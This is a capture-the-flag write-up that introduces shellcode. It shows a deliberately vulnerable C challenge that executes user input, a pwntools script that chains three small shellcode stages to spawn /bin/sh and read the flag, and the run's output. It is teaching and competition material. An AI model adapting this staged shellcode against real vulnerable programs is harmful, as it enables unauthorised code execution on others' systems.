# Shellcode

A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell.

## Example

### Bridge #1 from BookCTFv2

Answer from [@voydstack](https://twitter.com/voydstack)

#### bridge.c

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE 16

// gcc -z execstack ./bridge1.c -o bridge1

char buf3[BUFFER_SIZE];

int main(int argc, char *argv[]) {
	char buf1[BUFFER_SIZE];
	char *buf2;

	setvbuf(stdout, NULL, _IONBF, 0);

	buf2 = malloc(BUFFER_SIZE);

	printf("The bridge has been destroyed, we need you to rebuild it.\n");
	printf("This might help you: %p, %p, %p\n", buf1, buf2, buf3);
	printf("Good luck !\n");

	printf("First step:\n");
	read(0, buf1, BUFFER_SIZE);

	printf("Second step:\n");
	read(0, buf2, BUFFER_SIZE);

	printf("Third step:\n");
	read(0, buf3, BUFFER_SIZE);

	printf("Ok, let's check if your bridge is strong enough to handle a shell!\n");

	((void (*)())buf1)(); 

	return 0;
}
```

The goal here was to do a shellcode but we did not have so much space. We need to split our payload in three parts, then jump from buf1 to buf2 and finally from buf2 to buf3.

```python
#!/usr/bin/env python3
from pwn import *

REMOTE = True

if REMOTE:
    r = remote("bookctf.eu", 9006)
else:
    r = process("./bridge1")

raw_leak = r.recv().splitlines()[1].split(": ".encode())[1].split(", ".encode())

stack_buf = int(raw_leak[0], 16)
heap_buf = int(raw_leak[1], 16)
bss_buf = int(raw_leak[2], 16)

log.success(f"stack buffer is @{hex(stack_buf)}")
log.success(f"heap buffer is @{hex(heap_buf)}")
log.success(f"bss buffer is @{hex(bss_buf)}")

context.clear(arch="amd64")

"""
xor rsi, rsi ; set rsi to 0
call rdi ; go to second_stage
"""
first_stage = asm(
    f"""
    mov rdi, {hex(heap_buf)}
    xor rsi, rsi
    call rdi"""
)

log.info(f"first stage: {len(first_stage)}")
assert len(first_stage) <= 16

"""
mov al, 0x3b ; prepare execve syscall
call rdi ; go to third_stage
"""
second_stage = asm(
    f"""
    mov rdi, {hex(bss_buf)}
    mov al, 0x3b
    call rdi""" 
)

log.info(f"second stage: {len(second_stage)}")
assert len(second_stage) <= 16

"""
xor rdx, rdx ; set rdx to 0
add dil, 9 ; set rdi to the addr of '/bin/sh'
syscall ; execve('/bin/sh', 0, 0)
"""
third_stage = (
    asm(
        """
    xor rdx, rdx
    add dil, 9
    syscall""" 
    )
    + "/bin/sh".encode()
)

log.info(f"third stage: {len(third_stage)}")
assert len(third_stage) <= 16

r.sendline(first_stage)
r.recv()
r.sendline(second_stage)
r.recv()
r.sendline(third_stage)

r.sendline("cat flag.txt")
r.interactive()

r.close()
```

Execution

```shell
$ python3 solve.py
[+] Opening connection to bookctf.eu on port 9006: Done
[+] stack buffer is @0x7ffe758e2250
[+] heap buffer is @0x563388b0f260
[+] bss buffer is @0x5633876e7020
[*] first stage: 15
[*] second stage: 14
[*] third stage: 16
[*] Switching to interactive mode
Ok, let's check if your bridge is strong enough to handle a shell!
BC{c0nsTruc7_Br1dg35_4_fUn_4nD_pr0f17!!!}
```